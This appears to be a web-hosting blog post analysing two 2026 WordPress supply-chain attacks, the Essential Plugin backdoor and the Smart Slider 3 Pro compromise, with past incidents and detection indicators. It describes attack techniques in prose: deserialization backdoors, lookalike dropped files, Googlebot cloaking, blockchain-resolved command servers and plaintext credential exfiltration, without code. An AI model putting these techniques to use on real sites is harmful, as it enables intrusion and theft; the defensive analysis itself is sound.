In July 2025, Flippa published a case study celebrating the six-figure sale of a WordPress plugin portfolio called Essential Plugin. The buyer, identified in subsequent security research only as “Kris,” had a background in SEO, cryptocurrency marketing, and online gambling. On May 12, 2025, a new committer account appeared in WordPress.org’s SVN system with access to all 26 plugins. On August 8, 2025, Kris pushed version 2.6.7 with a changelog entry reading “Check compatibility with WordPress version 6.8.2.” The actual change was 191 lines of backdoor code. It sat dormant for eight months. On April 6, 2026, between 04:22 and 11:06 UTC, it activated and ran against every site that had the plugin installed. WordPress.org closed all 31 plugins from the account on April 7. The same week, an entirely separate attacker compromised Smart Slider 3 Pro’s update infrastructure and pushed a payload that exfiltrated admin usernames and passwords in plaintext from every site that ran the update.
How the Essential Plugin Backdoor Worked
The 191 lines of malicious PHP were hidden inside the plugins’ existing wpos-analytics module, which had previously been a legitimate analytics component. The weaponized fetch_ver_info() method called file_get_contents() against the attacker’s server at analytics.essentialplugin.com and passed the response directly to @unserialize(), a textbook PHP object injection vector that allows arbitrary code execution. The deserialized object then wrote files to disk via file_put_contents().
On activation, the module dropped a file named wp-comments-posts.php into the webroot, deliberately mimicking the legitimate WordPress core file wp-comments-post.php. It also injected a PHP block directly into wp-config.php. The injected code checked the visitor’s User-Agent: when it matched Googlebot, it served hidden spam links, redirects, and fake pages. Normal visitors and logged-in admins saw nothing. This is the standard technique for black-hat gambling and casino SEO campaigns, where poisoning a search engine’s index matters more than any change visible to humans. The payload also registered an unauthenticated REST API endpoint providing a second path to arbitrary code execution independent of the deserialization chain.
The command-and-control infrastructure resolved its address through an Ethereum smart contract queried via public blockchain RPC endpoints rather than a conventional domain. The specific chain has not been published by any researcher. The practical consequence: the C2 cannot be taken down through a registrar complaint or DNS blacklist. The attacker can update the contract to point to a new server at any time without touching the malware code already deployed on infected sites.
Kris’s profile, SEO professional with online gambling marketing experience, maps directly onto every technical choice: Googlebot cloaking is the tool of choice for gambling SEO spam, and blockchain-based C2 is a natural selection for someone familiar with cryptocurrency infrastructure. The attack was not technically sophisticated by nation-state standards. It was technically appropriate for exactly what it was trying to do.
The Remediation Gap
WordPress.org’s response on April 7 included a forced update to version 2.6.9.1 for affected sites and permanent closure of all 31 plugins from the account. The forced update disabled the wpos-analytics phone-home mechanism. It did not remove the PHP code already written into wp-config.php. WordPress.org’s official warning to affected sites stated directly: “While our update attempted to remove the backdoor automatically, it cannot confirm that it was fully eliminated.” Sites that were compromised during the six-hour-44-minute activation window on April 6 are still serving Googlebot spam after updating unless their wp-config.php and webroot have been manually inspected and cleaned. Standard plugin update status checks will show these sites as current and clean.
Smart Slider 3 Pro: A Different Attack, the Same Week
The Essential Plugin incident was still being analyzed when a second, unrelated attack hit Smart Slider 3 Pro, which has more than 800,000 installations across its free and Pro editions. This attack did not involve purchasing the plugin. An attacker compromised Nextend’s own update infrastructure servers and pushed malicious version 3.5.1.35 Pro, which was live for approximately six hours before detection.
The Smart Slider 3.5.1.35 payload was substantially more aggressive than the Essential Plugin SEO spam operation. It exfiltrated the site URL, admin email, admin username and password in plaintext, database name, WordPress version, PHP version, and a list of all installed persistence mechanisms to C2 domain wpjs1[.]com. It then installed three independent persistence mechanisms: a must-use plugin named object-cache-helper.php, code appended to the active theme’s functions.php, and a file named class-wp-locale-helper.php dropped into wp-includes/. It registered an init action that, when triggered with the correct GET parameter, ran arbitrary PHP via eval() or attempted OS command execution through six different PHP functions. Nextend pulled the malicious update, shut down update servers temporarily, and released clean version 3.5.1.36 Pro.
This Has Happened Before
The plugin acquisition attack pattern is not new. In 2017, Wordfence documented a buyer operating under the alias “Daley Tias” who purchased the Display Widgets plugin for approximately $15,000 and injected payday loan SEO spam, then went on to compromise at least nine plugins using the same acquisition-then-backdoor method. In 2022, AccessPress Themes was compromised via its own website rather than through a purchase, backdooring 40 themes and 53 plugins affecting 360,000 active installations. In June 2024, five plugins were backdoored through credential stuffing attacks on developer WordPress.org accounts. In July 2025, nine months before the Essential Plugin activation, the Gravity Forms official site was compromised and served a backdoored version to manual and Composer installs for two days.
The through-line across all of these incidents is the same structural gap: WordPress.org has no code signing for plugins, no mandatory two-factor authentication for plugin committers, and no security review triggered when a plugin changes hands. The plugin ownership transfer process is documented in the developer handbook and involves no automated scrutiny of the new owner’s identity or intentions. A buyer who completes a Flippa transaction and obtains SVN commit credentials has the same trusted status as the original developer who built the plugin over years.
What Managed WordPress Hosts Are Exposed To
The Essential Plugin case has a specific implication for managed WordPress hosts that operate automatic update pipelines. Any site updated between August 8, 2025 and April 7, 2026 received the backdoored version. Whether or not the C2 had activated by the time of that update, the code was present and waiting. Hosts that pushed automatic plugin updates to customer sites during that period may have distributed the backdoor at scale across their fleet. The remediation gap compounds this: a managed host’s standard site health checks will not detect the persistent wp-config.php injection. Detection requires checking for unexpected PHP blocks in wp-config.php, the presence of wp-comments-posts.php in the webroot, and Googlebot User-Agent responses that differ from standard visitor responses.
The Smart Slider 3 Pro incident demonstrates that the update channel itself is an attack surface separate from plugin ownership. A managed host that controls when plugins update does not control whether the plugin vendor’s update infrastructure has been compromised. Two separate incidents in the same week using the same delivery mechanism is not coincidence. AspirePress, a community project building a distributed WordPress package repository with code signing and authenticity verification, represents the infrastructure-level response to this pattern. The EU Cyber Resilience Act, which identifies the WordPress Foundation as a software steward with explicit security obligations, may be the regulatory forcing function that moves this from a community project to a platform requirement.
Łukasz Nowak
Nearly two decades in IT. A decade in web hosting - and still in the trenches. Writing about the infrastructure that runs the internet from the inside.
Sources
- Someone Bought 30 WordPress Plugins and Planted a Backdoor in All of Them - Anchor.host (Austin Ginder, original discovery)
- Critical Supply Chain Compromise on Essential Plugin - Patchstack
- WordPress Plugins Backdoor: Supply Chain Attack via Flippa - The Next Web
- Someone Planted Backdoors in Dozens of WordPress Plugins - TechCrunch
- Official Warning From WordPress.org Plugins Team - WordPress.org
- WordPress Plugin Suite Hacked to Push Malware - BleepingComputer
- WordPress Plugin Backdoor Hits 20,000+ Active Installations - TechNadu
- Backdoored Smart Slider 3 Pro Update Distributed via Compromised Nextend Servers - The Hacker News
- Smart Slider 3 Pro Supply Chain Compromise: Full Malware Analysis - Patchstack
- Smart Slider 3 Pro Security Advisory - Nextend
- Supply Chain Attack on WordPress.org Plugins (June 2024) - Wordfence
- Over 90 WordPress Themes and Plugins Backdoored (AccessPress 2022) - BleepingComputer
- AspirePress - Distributed WordPress Package Repository With Code Signing